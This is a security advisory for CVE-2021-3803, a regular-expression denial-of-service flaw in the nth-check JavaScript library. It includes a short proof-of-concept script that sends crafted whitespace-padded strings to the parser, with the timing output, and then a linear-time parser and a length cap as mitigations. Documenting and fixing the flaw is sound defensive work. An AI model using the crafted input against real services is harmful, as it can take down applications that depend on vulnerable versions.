
CVE-2021-3803

Inefficient Regular Expression Complexity in nth-check

There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks. The ReDoS weakness of the regex is mainly due to the sub-pattern `\s*(?:([+-]?)\s*(\d+))?`, whose adjacent quantifiers overlap (two `\s*` runs can each claim the same whitespace), and it can be triggered with the following code.

**Proof of Concept**

```js
// PoC.js
var nthCheck = require("nth-check")
for (var i = 1; i <= 50000; i++) {
  var time = Date.now();
  // Valid "2n" prefix, a growing run of spaces, then a character that forces the match to fail
  var attack_str = '2n' + ' '.repeat(i * 10000) + "!";
  try {
    nthCheck.parse(attack_str)
  } catch (err) {
    // Time spent backtracking before parse() rejects the input
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
  }
}
```

**The Output**

```
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
```
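As an added example (not the advisory's PoC and not nth-check's source), the following shows two mitigations a maintainer or consumer of such a parser can apply: a single-pass, non-backtracking parser for the CSS `an+b` notation, and a length cap applied before any regular expression runs. The full expression `VULNERABLE_RE` is a reconstruction assumed from the sub-pattern quoted above, and the names `parseNthLinear` and `checkNthBounded` are chosen here; the crafted input is constructed for the demonstration.

```javascript
// Added example: not the advisory's PoC and not nth-check's source.
// VULNERABLE_RE is an assumed reconstruction of the full pattern whose
// second half the advisory quotes; the two adjacent `\s*` quantifiers are
// what lets a run of spaces be split in O(n) ways on every failed match.
const VULNERABLE_RE = /^([+-]?\d*n)?\s*(?:([+-]?)\s*(\d+))?$/;

// Mitigation 1: a single-pass parser for CSS "an+b" with no backtracking,
// so cost grows linearly with input length even for crafted input.
// Returns [a, b]; throws on input it cannot parse.
function parseNthLinear(input) {
  const s = input.trim().toLowerCase();
  if (s === "even") return [2, 0];
  if (s === "odd") return [2, 1];

  const n = s.length;
  let i = 0;
  const skipSpaces = () => { while (i < n && s[i] === " ") i++; };
  const readSign = () => {
    if (s[i] === "+") { i++; return 1; }
    if (s[i] === "-") { i++; return -1; }
    return 1; // no explicit sign
  };
  const readDigits = () => {
    const start = i;
    while (i < n && s[i] >= "0" && s[i] <= "9") i++;
    return i > start ? Number(s.slice(start, i)) : null;
  };

  let a = 0;
  let b = 0;
  let sign = readSign();
  let digits = readDigits();
  if (s[i] === "n") {
    // "an" term present; a bare "n" means a = 1.
    i++;
    a = sign * (digits === null ? 1 : digits);
    skipSpaces();
    if (i < n) {
      // Optional "+b" / "-b" tail, with spaces allowed around the sign.
      sign = readSign();
      skipSpaces();
      digits = readDigits();
      if (digits === null) throw new Error(`Expected digits at offset ${i}`);
      b = sign * digits;
    }
  } else {
    // No "n": the whole expression is a constant b.
    if (digits === null) throw new Error("Expected a number, 'n', 'even' or 'odd'");
    b = sign * digits;
  }
  skipSpaces();
  if (i !== n) throw new Error(`Trailing input at offset ${i}`);
  return [a, b];
}

// Mitigation 2 (defense in depth): bound input length before any regex
// touches it. Legitimate an+b expressions are a handful of characters, so
// a cap well above that costs nothing and removes the quadratic blow-up.
function checkNthBounded(input, maxLen = 64) {
  if (typeof input !== "string" || input.length > maxLen) return false;
  return VULNERABLE_RE.test(input);
}

// Stand-alone demo with the crafted shape from the advisory, kept small (constructed input).
const crafted = "2n" + " ".repeat(5000) + "!";
try { parseNthLinear(crafted); } catch (e) { console.log("rejected:", e.message); }
console.log("bounded check:", checkNthBounded(crafted));
console.log("2n+1 ->", parseNthLinear("2n+1"));
```

The hand-written parser reads each character once, so the crafted input is rejected in time proportional to its length instead of the quadratic growth shown in the advisory's output; the length cap is a cheap second line of defense for code that must keep using a regular expression.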

Patch Available

Fix available through Seal Security. No upgrade required, protect your application instantly.

Vulnerability Details
| Field | Value |
| --- | --- |
| Score | 7.5 |
| Score Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
| Affected Versions | nth-check < 2.0.1 |
| Severity | High |
| Ecosystem | JavaScript |
| Publish Date | September 20, 2021 |
| Modified Date | November 7, 2023 |